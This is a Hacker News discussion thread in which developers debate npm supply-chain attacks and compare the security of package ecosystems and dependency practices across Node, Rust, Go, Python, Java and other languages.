Comment by vintagedave
4 days ago
Serious question: should someone develop new technologies using Node any more?
A short time ago, I started a frontend in Astro for a SaaS startup I'm building with a friend. Astro is beautiful. But it's build on Node. And every time I update the versions of my dependencies I feel terrified I am bringing something into my server I don't know about.
I just keep reading more and more stories about dangerous npm packages, and get this sense that npm has absolutely no safety at all.
It's not "node" or "Javascript" the problem, it's this convenient packaging model.
This is gonna ruffle some feathers, but it's only a matter of time until it'll happen on the Rust ecosystem which loves to depend on a billion subpackages, and it won't be fault of the language itself.
The more I think about it, the more I believe that C, C++ or Odin's decision not to have a convenient package manager that fosters a cambrian explosion of dependencies to be a very good idea security-wise. Ambivalent about Go: they have a semblance of packaging system, but nothing so reckless like allowing third-party tarballs uploaded in the cloud to effectively run code on the dev's machine.
I've worried about this for a while with Rust packages. The total size of a "big" Rust project's dependency graph is pretty similar to a lot of JS projects. E.g. Tauri, last I checked, introduces about 600 dependencies just on its own.
Like another commenter said, I do think it's partially just because dependency management is so easy in Rust compared to e.g. C or C++, but I also suspect that it has to do with the size of the standard library. Rust and JS are both famous for having minimal standard libraries, and what do you know, they tend to have crazy-deep dependency graphs. On the other hand, Python is famous for being "batteries included", and if you look at Python project dependency graphs, they're much less crazy than JS or Rust. E.g. even a higher-level framework like FastAPI, that itself depends on lower-level frameworks, has only a dozen or so dependencies. A Python app that I maintain for work, which has over 20 top-level dependencies, only expands to ~100 once those 20 are fully resolved. I really think a lot of it comes down to the standard library backstopping the most common things that everybody needs.
So maybe it would improve the situation to just expand the standard library a bit? Maybe this would be hiding the problem more than solving it, since all that code would still have to be maintained and would still be vulnerable to getting pwned, but other languages manage somehow.
I wouldn't call the Rust stdlib "small". "Limited" I could agree with.
On the topics it does cover, Rust's stdlib offers a lot. At least on the same level as Python, at times surpassing it. But because the stdlib isn't versioned it stays away from everything that isn't considered "settled", especially in matters where the best interface isn't clear yet. So no http library, no date handling, no helpers for writing macros, etc.
You can absolutely write pretty substantial zero-dependency rust if you stay away from the network and async
Whether that's a good tradeoff is an open question. None of the options look really great
24 replies →
It's already happening: https://cyberpress.org/malicious-rust-packages/
My personal experience (YMMV): Rust code takes 2x or 3x longer to write than what came before it (C in my case), but in the end you usually get something much more likely to work, so overall it's kind of a wash, and the product you get is better for customers - you basically front load the cost of development.
This is terrible for people working in commercial projects that are obsessed with time to market.
Rust developers on commercial projects are under incredible schedule pressure from day 0, where they are compared to expectations from their previous projects, and are strongly motivated to pull in anything and everything they can to save time, because re-rolling anything themselves is so damn expensive.
10 replies →
> Rust and JS are both famous for having minimal standard libraries
I'm all in favor of embiggening the Rust stdlib, but Rust and JS aren't remotely in the same ballpark when it comes to stdlib size. Rust's stdlib is decidedly not minimal; it's narrow, but very deep for what it provides.
C standard library is also very small. The issue is not the standard library. The issue is adding libraries for snippets of code, and in the name of convenience, let those libraries run code on the dev machine.
3 replies →
This is a reason why so many enterprises use C#. Most of the time you just use Microsoft made libraries and rarely brings in 3rd party.
8 replies →
And yet of course the world and their spouse import requests to fetch a URL and view the body of the response.
It would be lovely if Python shipped with even more things built in. I’d like cryptography, tabulate/rich, and some more featureful datetime bells and whistles a la arrow. And of course the reason why requests is so popular is that it does actually have a few more things and ergonomic improvements over the builtin HTTP machinery.
Something like a Debian Project model would have been cool: third party projects get adopted into the main software product by a sworn-in project member who who acts as quality control / a release manager. Each piece of software stays up to date but also doesn’t just get its main branch upstreamed directly onto everyone’s laps without a second pair of eyes going over what changed. The downside is it slows everything down, but that’s a side-effect of, or rather a synonym for stability, which is the problem we have with npm. (This looks sort of like what HelixGuard do, in the original article, though I’ve not heard of them before today.)
10 replies →
It might solve the problem, in as much as the problem is that not only can it be done, but it’s profitable to do so. This is why there’s no Rust problem (yet).
It won't, it's a culture issue
Most rust programmers are mediocre at best and really need the memory safety training wheels that rust provides. Years of nodejs mindrot has somehow made pulling into random dependencies irregular release schedules to become the norm for these people. They'll just shrug it off come up with some "security initiative* and continue the madness
1 reply →
I agree partly. I love cargo and can’t understand why certain things like package namespaces and proof of ownership isn’t added at a minimum. I was mega annoyed when I had to move all our Java packages from jcenter, which was a mega easy setup and forget affair, to maven central. There I suddenly needed to register a group name (namespace mostly reverse domain) and proof that with a DNS entry. Then all packages have to be signed etc. In the end it was for this time way ahead. I know that these measures won’t help for all cases. But the fact that at least on npm it was possible that someone else grabs a package ID after an author pulled its packages is kind of alarming. Dependency confusion attacks are still possible on cargo because the whole - vs _ as delimiter wasn’t settled in the beginning. But I don’t want to go away from package managers or easy to use/sharable packages either.
> But the fact that at least on npm it was possible that someone else grabs a package ID after an author pulled its packages is kind of alarming.
Since your comment starts with commentary on crates.io, I'll note that this has never been possible crates.io.
> Dependency confusion attacks are still possible on cargo because the whole - vs _ as delimiter wasn’t settled in the beginning.
I don't think this has ever been true. AFAIK crates.io has always prevented registering two different crates whose names differ only in the use of dashes vs underscores.
> package namespaces
See https://github.com/rust-lang/rust/issues/122349
> proof of ownership
See https://github.com/rust-lang/rfcs/pull/3724 and https://blog.rust-lang.org/2025/07/11/crates-io-development-...
4 replies →
I'm a huge Go proponent but I don't know if I can see much about Go's module system which would really prevent supply-chain attacks in practice. The Go maintainers point [1] at the strong dependency pinning approach, the sumdb system and the module proxy as mitigations, and yes, those are good. However, I can't see what those features do to defend against an attack vector that we have certainly seen elsewhere: project gets compromised, releases a malicious version, and then everyone picks it up when they next run `go get -u ./...` without doing any further checking. Which I would say is the workflow for a good chunk of actual users.
The lack of package install hooks does feel somewhat effective, but what's really to stop an attacker putting their malicious code in `func init() {}`? Compromising a popular and important project in this way would likely be noticed pretty quickly. But compromising something widely-used but boring? I feel like attackers would get away with that for a period of time that could be weeks.
This isn't really a criticism of Go so much as an observation that depending on random strangers for code (and code updates) is fundamentally risky. Anyone got any good strategies for enforcing dependency cooldown?
[1] https://go.dev/blog/supply-chain
A big thing is that Go does not install the latest version of transitive dependencies. Instead it uses Minimal version selection (MVS), see https://go.dev/ref/mod#minimal-version-selection. I highly recommend reading the article by Russ Cox mentioned in the ref. This greatly decreases your chances of being hit by malware released after a package is taken over.
In Go, access to the os and exec require certain imports, imports that must occur at the beginning of the file, this helps when scanning for malicious code. Compare this JavaScript where one could require("child_process") or import() at any time.
Personally, I started to vendor my dependencies using go mod vendor and diff after dependency updates. In the end, you are responsible for the effect of your dependencies.
In Go you know exactly what code you’re building thanks to gosum, and it’s much easier to audit changed code after upgrading - just create vendor dirs before and after updating packages and diff them; send to AI for basic screening if the diff is >100k loc and/or review manually. My projects are massive codebases with 1000s of deps and >200MB stripped binaries of literally just code, and this is perfectly feasible. (And yes I do catch stuff occasionally, tho nothing actively adversarial so far)
I don’t believe I can do the same with Rust.
2 replies →
The Go standard library is a lot more comprehensive and usable than Node, so you need less dependencies to begin with.
Aside from other security features already mentioned Go also doesn't execute code at compile time by design.
There is no airtight technical solution, for any language, for preventing malicious dependencies making it into your application. You can have manual or automated review using heuristics but things will still slip through. Malicious code doesn't necessarily look obvious, like decoding some base64 and piping it into bash, it can be an extremely subtle vulnerability sprinkled in that nobody will find until it's too late.
RE dependency cooldowns I'm hoping Go will get support for this. There's a project called Athens for running your own Go module proxy - maybe it could be implemented there.
> However, I can't see what those features do to defend against an attack vector that we have certainly seen elsewhere: project gets compromised, releases a malicious version, and then everyone picks it up when they next run `go get -u ./...` without doing any further checking. Which I would say is the workflow for a good chunk of actual users.
You can't, really, aside from full on code audits. By definition, if you trust a maintainer and they get compromised, you get compromised too.
Requiring GPG signing of releases (even by just git commit signing) would help but that's more work for people to distribute their stuff, and inevitably someone will make insecure but convenient way to automate that away from the developer
Historically, arguments of "it's popular so that's why it's attacked" have not held up. Notable among them was addressing Windows desktop security vulnerabilities. As Linux and Mac machines became more popular, not to mention Android, the security vulnerabilities in those burgeoning platforms never manifested to the extent that they were in Windows. Nor does cargo or pip seem to be infected with these problems to the extent that npm is.
> Nor does cargo or pip seem to be infected with these problems to the extent that npm is.
Easy reason. The target for malware injections is almost always cryptocurrency wallets and cloud credentials (again, mostly to mine cryptocurrencies). And the utter utter majority of stuff interacting with crypto and cloud, combined with a lot of inexperienced juniors who likely won't have the skill to spot they got compromised, is written in NodeJS.
Compared to the JS ecosystem and number of users both Python and Rust are puny, also the the NPM ecosystem also allowed by default for a lot of post-install actions since they wanted to enable a smooth experience with compiling and installing native modules (Not entirely sure how Cargo and PIP handles native library dependencies).
As for Windows vs the other OS's, yes even the Windows NT family grew out of DOS and Win9x and tried to maintain compatiblity for users over security up until it became untenable. So yes, the base _was_ bad when Windows was dominant but it's far less bad today (why people target high value targets via NPM,etc since it's an easier entry-point).
Android/iOS is young enough that they did have plenty of hindsight when it comes to security and could make better decisions (Remember that MS tried to move to UWP/Appx distribution but the ecosystem was too reliant on newer features for it to displace the regular ecosystem).
Remember that we've had plenty of annoyed discourse about "Apple locking down computers" here and on other tech forums when they've pushed notarization.
I guess my point is that, people love to bash on MS but at the same time complain about how security is affecting their "freedoms" when it comes to other systems (and partly MS), MS is better at the basics today than they were 20-25 years ago and we should be happy about that.
6 replies →
> It's not "node" or "Javascript" the problem, it's this convenient packaging model.
That and the package runtime runs with all the same privileges and capabilities as the thing you're building, which is pretty insane when you think about it. Why should npm know anything outside of the project root even exists, or be given the full set of environment variables without so much as a deny list, let alone an allow list? Of course if such restrictions are available, why limit them to npm?
The real problem is that the security model hasn't moved substantially since 1970. We already have all the tools to make things better, but they're still unportable and cumbersome to use, so hardly anything does.
pnpm (maybe yarn too?) requires explicit allowlisting of build scripts, hopefully npm will do the same eventually
> security model
yep, some kind of seccomp or other kind of permission system for modules would help a lot. (eg. if the 3rd party library is parsing something and its API only requires a Buffer as input and returns some object then it could be marked "pure", if it supports logging then that could be also specified, and so on)
2 replies →
Every time I look at a new project, my face falls when it's written in Rust. I simply don't trust a system that pulls in gigabytes of god-knows-what off the cloud, and compiles it on my box. It's a real barrier to entry, for me.
When I download a C project, I know that it only depends on my system libraries - which I trust because I trust my distro. Rust seems to expect me to take a leap in the dark, trusting hundreds of packagers and their developers. That might be fine if you're already familiar with the Rust ecosystem, but for someone who just wants to try out a new program - it's intimidating.
On Debian you can use the local registry for Rust which is backed by packages.
Though I will say, even as someone who works at a company that sells Linux distributions (SUSE), while the fact we have an additional review step is nice, I think the actual auditing you get in practice is quite minimal.
For instance, quite recently[1] the Debian package for a StarDict plugin was configured automatically upload all text selected in X11 to some Chinese servers if you installed it. This is the kind of thing you'd hope distro maintainers to catch.
Though, having build scripts be executed in distribution infrastructure and shipped to everyone mitigates the risk of targeted and "dumb" attacks. C build scripts can attack your system just as easily as Rust or JavaScript ones can (in fact it's probably even easier -- look at how the xz backdoor took advantage of the inscrutability of autoconf).
[1]: https://www.openwall.com/lists/oss-security/2025/08/04/1
You don't know that about a C project. And you still don't know what lurks in its 1000th reimplementation of http header parsing.
2 replies →
I think this is right about Rust and Cargo, but I would say that Rust has a major advantage in that it implements frozen + offline mode really well (which if you use, obviously significantly decreases the risks).
Any time I ever did the equivalent with NPM/node world it was basically unusable or completely impractical
Pnpm (a very popular npm replacement) makes completely locked packages easy and natural and ultra fast:
https://pnpm.io/cli/install
Benchmarks:
https://pnpm.io/benchmarks
3 replies →
There are ecosystems that have package managers but also well developed first party packages.
In .NET you can cover a lot of use cases simply using Microsoft libraries and even a lot of OSS not directly a part of Microsoft org maintained by Microsoft employees.
2020 State of the Octoverse security report showed that .NET ecosystem has on average the lowest number of transitive dependencies. Big part of that is the breadth and depth of the BCL, standard libraries, and first party libraries.
3 replies →
Sounds to me like another example of embrace - extend - extinguish
1 reply →
Supply chain attacks are scary because you do everything "right", but the ecosystem still compromises you.
But realistically, I think the sum total of compromises via package managers attacks is much smaller than the sum total of compromises caused by people rolling their own libraries in C and C++.
It's hard to separate from C/C++'s lack of memory safety, which causes a lot of attacks, but the fact that code reuse is harder is a real source of vulnerabilities.
Maybe if you're Firefox/Chromium, and you have a huge team and invest massive efforts to be safe, you're better off with the low-dependency model. But for the median project? Rolling your own is much more dangerous than NPM/Cargo.
Rust (and really, any but JS) ecosystem have a bit more "due dilligence" applied everywhere; I don't doubt someone will try to namesquat but chance of success are far smaller
> The more I think about it, the more I believe that C, C++ or Odin's decision not to have a convenient package manager that fosters a cambrian explosion of dependencies to be a very good idea security-wise.
There was no decision in case of C/C++; it was just not a thing languages had at the time so the language itself (especially C) isn't written in a way to accommodate it nicely
> Ambivalent about Go: they have a semblance of packaging system, but nothing so reckless like allowing third-party tarballs uploaded in the cloud to effectively run code on the dev's machine.
Any code you download and compile is running code on dev machine; and Go does have tools to do that in compile process too.
I do however like the by default namespacing by domain, there is no central repository to compromise, and forks of any defunct libs are easier to manage.
> Rust (and really, any but JS) ecosystem have a bit more "due dilligence" applied everywhere; I don't doubt someone will try to namesquat but chance of success are far smaller
I really agree, and I feel like it's a culture difference. Javascript was (and remains) an appealing programming language for tinkerers and hobbyists, people who don't really have a lot of engineering experience. Node and npm rose to prominence as a wild west with lots of new developers unfamiliar with good practices, stuck with a programming environment that had few "batteries included," and at a time when supply chain attacks weren't yet on everybody's minds. The barriers to entry were low and, well, the ecosystem sort of reflected that. You can't wash that legacy away overnight.
Rust in contrast attracts a different audience because of the language's own design objectives.
Obviously none of this makes it immune, and you can YOLO install random dependencies in any programming language, but I don't think any language is ever going to suffer from this in quite the same way and to the same extent that JS has simply due to when and how the ecosystem evolved.
And really, even JS today is not JS of yesteryear. Sure there are lots of bad actors and these bad NPM packages sneak in, but also... how widely are all of them used? The maturation of and standardization on certain "batteries included" frameworks rather than ad hoc piecing stuff together has reduced the liklihood of going astray.
I have a similar opinion but I think Java's model with maven and friends hits the sweet spot:
- Packages are always namespaced, so typosquating is harder - Registries like Sonatype require you to validate your domain - Versions are usually locked by default
My professional life has been tied to JVM languages, though, so I might be a bit biased.
I get that there are some issues with the model, especially when it comes to eviction, but it has been "good enough" for me.
Curious on what other people think about it.
Maven does not support "scripts" as NPM does, such as the pre-install script used for this exploit. With scripts enabled, the mere act of downloading a dependency requires a high degree of trust in it.
1 reply →
While I agree that dependency tree size can be sometimes a problem in Rust, I think it often gets overblown. Sure, having hundreds of dependencies in a "simple" project can be scary, but:
1) No one forces you to use dependencies with large number of transitive dependencies. For example, feel free to use `ureq` instead of `reqwest` pulling the async kitchen sink with it. If you see an unnecessary dependency, you could also ask maintainers to potentially remove it.
2) Are you sure that your project is as simple as you think?
3) What matters is not number of dependencies, but number of groups who maintain them.
On the last point, if your dependency tree has 20 dependencies maintained by the Rust lang team (such as `serde` or `libc`), your supply chain risks are not multiplied by 20, they stay at one and almost the same as using just `std`.
On your last note, I wish they would get on that signed crate subset. Having the same dependency tree as cargo, clippy, and rustc isn't increasing my risk.
Rust has already had a supply chain attack propagating via build.rs some years ago. It was noticed quickly, so staying pinned to the oldest thing that worked and had no cve pop in cargo audit is a decent strategy. The remaining risk is that some more niche dependency you use is and always has been compromised.
Is serde maintained by the Rust team? I thought it was basically a one-man show owned by dtolnay
> The more I think about it, the more I believe that C, C++ or Odin's decision not to have a convenient package manager that fosters a cambrian explosion of dependencies to be a very good idea security-wise.
The safest code is the code that is not run. There is no lack of attacks targeting C/C++ code, and odin is just a hobby language for now.
Don't worry about C or C++, we create the vulnerabilities ourselves !
I get the joke, but that makes me think.
What is worse between writing potentially vulnerable code yourself and having too many dependencies.
Finding vulnerabilities and writing exploits is costly, and hackers will most likely target popular libraries over your particular software, much higher impact, and it pays better. Dependencies also tend to do more than you need, increasing the attack surface.
So your C code may be worse in theory, but it is a smaller, thus harder to hit target. It is probably an advantage against undiscriminating attacks like bots and a downside against targeted attacks by motivated groups.
Using C++ daily, whenever I do js/ts are some javascript variant, since I don't use it daily, and update becomes a very complex task. frameworks and deps change APIs very frequently.
It's also very confusing (and I think those attack vectors benefit exactly from that), since you have a dependency but the dep itself dependent on another dep version.
Building basic CapacitorJS / Svelte app as an example, results many deps.
It might be a newbie question, but, Is there any solution or workflow where you don't end up with this dependency hell?
Don't use a framework? Loading a JS script on a page that says "when a update b" hasn't changed much in about 20 years.
Maybe I'm being a bit trite but the world of JavaScript is not some mysterious place separate from all other web programming, you can make bad decisions on either side of the stack. These comments always read like devs suddenly realizing the world of user interactions is more complicated and has more edge cases than they think.
There's no solution. The JS world is just nonstop build and dependency hell.
Being incredibly strict with TS compiler and linter helps a bit.
Not knowing that much about apt, isn't _any_ package system vulnerable, and purely a question of what guards are in place and what rights are software given upon install?
It's not the packaging tech. Apt will typically mean a Debian-based distro. That means the packages are chosen by the maintainers and updated only during specific time periods and tested before release. Even if the underlying software gets owned and replaced, the distro package is very unlikely to be affected. (Unless someone spent months building trust, like xz)
But the basic takeover... no, it usually won't affect any Debian style distro package, due to the release process.
3 replies →
Agreed with the first half, but giving up on convenient packaging isn't the answer.
Things like cargo-vet help as does enforcing non-token auth, scanning and required cooldown periods.
Out of the 789 npm packages in this incident, only 4 were ever used in any dependency tree of any Linux operating system (including Homebrew). Not in the affected versions, but ever.
If your Rust software observes a big enough chunk of the computer fever dream you are likely to end up with 2-3 digit amount of Rust dependencies, but they are probably all going to be high profile ones (tokio, anyhow, reqwest, the hyper crates, ...), instead of niche ones that never make it into any operating system.
This is not a silver bullet of course, but there seems to be an inverse correlation between "is part of any operating system dependency tree" and "gets compromised in an npm-like incident".
> The more I think about it, the more I believe that C, C++ or Odin's decision not to have a convenient package manager that fosters a cambrian explosion of dependencies to be a very good idea security-wise. Ambivalent about Go: they have a semblance of packaging system, but nothing so reckless like allowing third-party tarballs uploaded in the cloud to effectively run code on the dev's machine.
The alternative that C/C++/Java end up with is that each and every project brings in their own Util, StringUtil, Helper or whatever class that acts as a "de-facto" standard library. I personally had the misfortune of having to deal with MySQL [1], Commons [2], Spring [3] and indirectly also ATG's [4] variants. One particularly unpleasant project I came across utilized all four of them, on top of the project's own "Utils" class that got copy-and-paste'd from the last project and extended for this project's needs.
And of course each of these Utils classes has their own semantics, their own methods, their own edge cases and, for the "organically grown" domestic class that barely had tests, bugs.
So it's either a billion "small gear" packages with dependency hell and supply chain issues, or it's an amalgamation of many many different "big gear" libraries that make updating them truly a hell on its own.
[1] https://jar-download.com/artifacts/mysql/mysql-connector-jav...
[2] https://commons.apache.org/proper/commons-lang/apidocs/org/a...
[3] https://docs.spring.io/spring-framework/docs/current/javadoc...
[4] https://docs.oracle.com/cd/E55783_02/Platform.11-2/apidoc/at...
That is true, but the hand-rolled StringUtil won't steal your credentials and infect your machine, which is the problem here.
And what is wrong with writing your own util library that fits your use case anyway? In C/C++ world, if it takes less than a couple hours to write, you might as well do it yourself rather than introduce a new dependency. No one sane will add a third-party git submodule, wire it to the main Makefile, just to left-pad a string.
6 replies →
My feeling is that languages with other packing models are merely less convenient, and there is no actual tangible difference security-wise. Just take C and replace "look for writable repositories". It just takes more work and is less uniform to say write a worm that looks for writable cmake/autoconf and replicate that way.
What would actually stop this is writing compilers and build systems in a way that isolates builds from one another. It's kind of stupid that all a compiler really needs is an input file, a list of dependencies, and an output file. Yet they all make it easy to root around, replicate and exfiltrate. It can be both convenient and not suffer from these style of attacks.
Not really. cmake and automake are for compiling the library, not for the downloading it. The gap between the two is what's get erased from npm. And it made worse because of the auto update set by default when `npm install` is run.
Not having a convenient package manager doesn't mean you don't need the functionality that's otherwise offered by third-party packages, it just means that you either need other means to obtain those third-party packages (usually reducing the visibility this dependency!) or implement them yourself (sometimes this is good, but sometimes this can also be very bad for security. Your DYI code won't get as many eyes and audits as the popular third party package!).
Must read: https://wiki.alopex.li/LetsBeRealAboutDependencies
Indeed, Rust's supply chains story is an absolute horror, and there are countless articles explaining what should be done instead (e.g. https://kerkour.com/rust-stdx)
TL;DR: ditch crates.io and copy Go with decentralized packages based directly on and an extended standard library.
Centralized package managers only add a layer of obfuscation that attackers can use to their advantage.
On the other hand, C / C++ style dependency management is even worse than Rust's... Both in terms of development velocity and dependencies that never get updated.
> countless articles explaining what should be done instead (e.g. https://news.ycombinator.com/item?id=41727085#41727410
> Centralized package managers only add a layer of obfuscation that attackers can use to their advantage.
They add a layer of convenience. C/C++ are missing that convenience because they aren't as composable and have a long tail of pre-package manager projects.
Java didn't start with packages, but today we have packages. Same with JS, etc.
2 replies →
I believe you, in that package management with dependencies without security mitigation is both convenient and dangerous. And I certainly agree this could happen for other package managers as well.
My real worry, for myself re the parent comment is, it's just a web frontend. There are a million other ways to develop it. Sober, cold risk assessment is: should we, or should we have, and should anyone else, choose something npm-based for new development?
Ie not a question about potential risk for other technologies, but a question about risk and impact for this specific technology.
> C/C++ .. a convenient package manager
Every time I fire up "cmake" I chant a little spell that protects me from the goblins that live on the other side of FetchContent to promise to the Gods of the Repo that I will, eventually, review everything to make sure I'm not shipping poop nuggets .. just as soon as I get the build done, tested .. and shipped, of course .. but I never, ever do.
Surely in this case the problem is a technical one, and with more work towards a better security model and practices we can have the best of both worlds, no?
Agreed, rust's cargo model is basically the worst part of that ecosystem right now. I've had developers submit pretty simple cli tools with hundreds and hundreds of dependencies. I guess there wasn't any lessons learned from the state of NPM.
Just a last month someone was trying to figure the cargo tree on which Rust package got imported implicitly via which package. This will totally happen in rust as well as long as you use some kind of package manager. Go for zero or less decencies.
It already did happen. It propogated via build.rs as well. But as I said elsewhere, ut doesn't help you to forgo dependencies part of rust tooling itself.
less?
3 replies →
It’ll probably happen eventually with Rust, but ecosystem volume and informal packaging processes / a low barrier to entry seem to be significant driver in the npm world.
(These are arguably good things in other contexts.)
I don’t get this
I installed the package, obviously I intend to run it. How does getting pwned once I run it manually differ from getting pwned once I install it? I’m still getting pwned
NPM default installation method does not really lock down you dependencies. It allows for update when the patch number (semver) is increased. Which is why those malware bump it up. Anyone who then run `npm install` will get it and will run the code.
In the early days the Node ecosystem adopted (from Unix) the notion that everything has to be its own micro package. Not only was there a failure to understand what it was actually talking about, but it was never a good fit for package management to begin with.
I understand that there's been some course correction recently (zero dependency and minimal dependency libs), but there are still many devs who think that the only answer to their problem is another package, or that they have to split a perfectly fine package into five more. You don't find this pattern of behavior outside of Node.
> In the early days the Node ecosystem adopted (from Unix) the notion that everything has to be its own micro package.
The medium is the message. If a language creates a very convenient package manager that completely eliminates the friction of sharing code, practically any permutation of code will be shared as a library. As productivity is the most important metric for most companies, devs will prefer the conveniently-shared third-party library instead of implementing something from scratch. And this is the result.
I don't believe you can have packaging convenience and avoiding dependency hell. You need some amount of friction.
1 reply →
Node is the embodiment of move and break things. Probably will not build anything that should last more than a few months on node.
Why the word "semblance" with regard to Go modules? Are you trying to say this system is lacking something?
An open question is why PyPI doesn’t have the same problem.
PyPI is also subject to supply chain attacks. What do you mean?
maybe the solution is what linux & co used for many years: have a team of people who vet and package dependencies.
do they follow the same process ? or is it harder to submit a package and vet it on rust/cargo ?
I hate to be the guy saying AI will solve it, but this is a case where AI can help. I think in the next couple of years we’ll see people writing small functions with Claude/codex/whatever instead of pulling in a dependency. We might or might not like the quality of software we see, but it will be more resistant to supply chain attacks.
How is this going to solve the supply chain attack problem at all though? It just obfuscates things even more, because once an LLM gets "infected" with malicious code, it'll become much more difficult to trace where it came from.
If anything, blind reliance on LLMs will make this problem much worse.
When there's a depedency, it's typically not for a small function. If you want to replace a full dependency package by your own generated code, you'll need to review hundreds of even thousands of line of code.
Now will you trust that AI didn't include its own set of security issues and will you have the ability to review so much code?
I wonder what the actual result will be. LLMs can generate functions quickly, but they're also keen to include packages without asking. I've had to add a "don't add new dependencies unless explicitly asked" to a few project configs.
For sure. I don't think the software ecosystem has come to terms with how things are going to change.
Libraries will be providing raw tools like - Sockets, Regex Engine, Cryptography, Syscalls, specific file format libraries
LLMs will be building the next layer.
I have build successful running projects now in Erlang, Scheme, Rust - I know the basic syntax of two of those but I couldn't write my deployed software in any of them in the couple of hours of prompting.
The scheme it had to do a lot of code from first principles and warned me how laborious it would be - "I don't care, you are doing it."
I have tools now I could not have imagined I could build in a reasonable time.
An approach I learnt from a talk posted to HN (I forget the talk, not the lesson) is to not depend on the outside project for its code, just lift that code directly in to your project, but to rely on it for the tests, requiring/importing it etc when running your own tests. That protects you from a lot of things (this kind of attack was not mentioned, afaic recall) but doesn’t allow bugs found by the other project to be missed either.
Then your dependency will be "AI getting it right every single time".
I don’t think I’ll live long enough to trust AI coding assistants with something like schema validation, just to name one thing I use dependencies for.
Go is just as bad.
Nope. Know the difference.
2 replies →
> but it's only a matter of time until it'll happen on the Rust ecosystem
Totally 100% agree, though tools like cargo tree make it more of a tractable problem, and running vendored dependencies is first class at least.
The one I am genuinely most concerned of is Golang. The way Dependencies are handled leaves much to be desired, I'm really surprised that there haven't been issues honestly.
The problem isn't specific to node. NPM is just the most popular repo so the most value for attacks. The same thing could happen on RubyGems, Cargo, or any of the other package managers.
NPM has about 4 million packages, Maven Central has about 3 million packages.
If this were true, wouldn't there have been at least one Maven attack by now, considering the number of NPM attacks that we've seen?
Been a while since I looked into this, but afaik Maven Central is run by Sonatype, which happens to be one of the major players for systems related to Supply Chain Security.
From what I remember (a few years old, things may have changed) they required devs to stage packages to a specific test env, packages were inspected not only for malware but also vulnerabilities before being released to the public.
NPM on the other hand... Write a package -> publish. Npm might scan for malware, they might do a few additional checks, but at least back when I looked into it nothing happened proactively.
1 reply →
There were. They're just not as popular here. For example https://www.sonatype.com/blog/malware-removed-from-maven-cen...
Maven is also a bit more complex than npm and had an issue in the system itself https://arxiv.org/html/2407.18760v4
As of 2024, Maven had 1.5 trillion requests annually vs npm's 4.5 trillion - regardless of package count, 3x more downloads in total does make it a very big target (numbers from https://www.sonatype.com/state-of-the-software-supply-chain/...).
No. Having many packages might not be the only reason to start an attack. This post shows it is/was possible in the Maven ecosystem: https://blog.oversecured.com/Introducing-MavenGate-a-supply-...
One speculation would be is that most Java apps in the wild use way older Java versions (say 17/11, while the latest will LTS is 21).
Okay then, explain to me why this is only possible with NPM? Does it have a hidden "pwn" button that I don't know about?
3 replies →
Make no mistake, Maven Central does get multiple malware components uploaded each year, though not nearly to the same extent as npm or pypi. Sonatype (my former employer) just doesn't report on these publicly each time it happens. It's not an isolated problem but certainly harder to do with maven.
2 replies →
Hoe many daily downloads does Maven have?
The concern is not 'could' happen, but _does_ happen. I know this could occur in many places. But where it seems highly prevalent is NPM.
And I am genuinely thinking to myself, is this making using npm a risk?
Just use dependency cooldown. It will mitigate a lot of risk.
3 replies →
NPM is the largest possible target for such an attack.
Attack an important package, and you can get into the Node and Electron ecosystem. That's a huge prize.
Value is one thing but the average user (by virtue of being popular) will be just less clued in on any security practices that could mitigate the problem.
I've started to feel it is much more an npm problem than a node problem. One of the things I've started leaning on more is prioritizing packages from JSR [0]. JSR is a part of Deno's efforts, so is often easiest to use in Deno packages, but most of the things with high scores on JSR get cross-published to npm and the few that prefer JSR only there's an alright JSR bridge to npm.
Of course using more JSR packages does start to add more reason to prefer Deno to Node. Also, there are still some packages that are deno.land/x/ only (sort of the first version of JSR, but no npm cross-compatibility) worth checking out. For instance, I've been impressed with Lume [1], a thoughtful SSG that's sort of the opposite of Astro in that it iterates at a slow, measured pace, and doesn't try to be a kitchen sink but more of workbench with a lot of tools easy to find. It's deno.land/x/ only for now for reasons I don't entirely agree with but I can't deny that JSR can be quite a step up in publishing complexity for not exactly obvious gain.
[0] https://jsr.io/
[1] https://lume.land/
Node is fine, the issue lies in its package model and culture:
* Many dependencies, so much you don't know (and stop caring) what is being used.
* Automatic and regular updates, new patch versions for minor changes, and a generally accepted best practice of staying up to date on the latest versions of things, due to trauma from old security breaches or big migrations after not updating for a while.
* No review, trust based self-publishing of packages and instant availability
* untransparent pre/postinstall scripts
The fix is both cultural and technological:
* Stop releasing for every fart; once a week is enough, only exception being critical security reasons.
* Stop updating immediately whenever there's an update; once a week is enough.
* Review your updates
* Pay for a package repository that actually reviews changes before making them widely available. Actually I think the organization between NPM should set that up, there's trillion dollar companies using the Node ecosystem who would be willing and able to pay for some security guarantees.
Microsoft owns npmjs.com. They could pay for AI analysis of published version deltas, looking for backdoors and malware.
I’m not a node/js apologist, but every time there is a vulnerability in NPM package, this opinion is voiced.
But in reality it has nothing to do with node/js. It’s just because it’s the most used ecosystem. So I really don’t understand the argument of not using node. Just be mindful of your dependencies and avoid updating every day.
It has everything to do with node/js. Because the community believes in tiny dependencies that must be updated as often as possible and the tooling reflects that belief.
it's interesting that staying up to date with your dependencies is considered a vulnerability in Node
Having a cooldown is different from never updating. I don’t think waiting a few days is a bad security practice in any environment, node or otherwise.
1 reply →
People who live on the edge of updates always risk vulnerabilities and incompatibility issues. It’s not about node, but anything software related.
We chose to write our platform for product security analytics (1) with PHP, primarily because it still allows us to create a platform without bringing in over 100 dependencies just to render one page.
I know this is a controversial approach, but it still works well in our case.
"require": { "php": ">=8.0",
1. https://github.com/tirrenotechnologies/tirreno
Not sure what the language has anything to do with it, we've built JavaScript applications within pulling in 100s of NPM packages before NPM was a thing, people and organizations can still do so today, without having to switch language, if they don't want to.
Does it require disciple and a project not run by developers who just learned program? You betcha.
I might say that every interpreter has a different minimum dependency level just to create a simple application. If we're talking about Node.js, there's a long list of dependencies by default.
So yes, in comparison, modern vanilla PHP with some level of developer discipline (as you mentioned) is actually quite suitable, but unfortunately not popular, for low-dependency development of web applications.
4 replies →
Ah yes PHP, the language known for its strong security...
Oh yes, let's remember PHP 4.3 and all the nostalgic baggage from that era.
Modern PHP is leagues above Javascript
3 replies →
Just keep the number of packages you use to a minimum. If some package itself has like 200 deps uninstall that and look for an alternative with less deps or think if you really need said package.
I also switched to Phoenix using Js only when absolutely necessary. Would do the same on Laravel at work if switching to SSR would be feasible...
I do not trust the whole js ecosystem anymore.
Did Phoenix not require npm at some point or is that not true?
At the beginning, but not anymore. You still have the option to pull libraries and packages but is not really required by default.
1 reply →
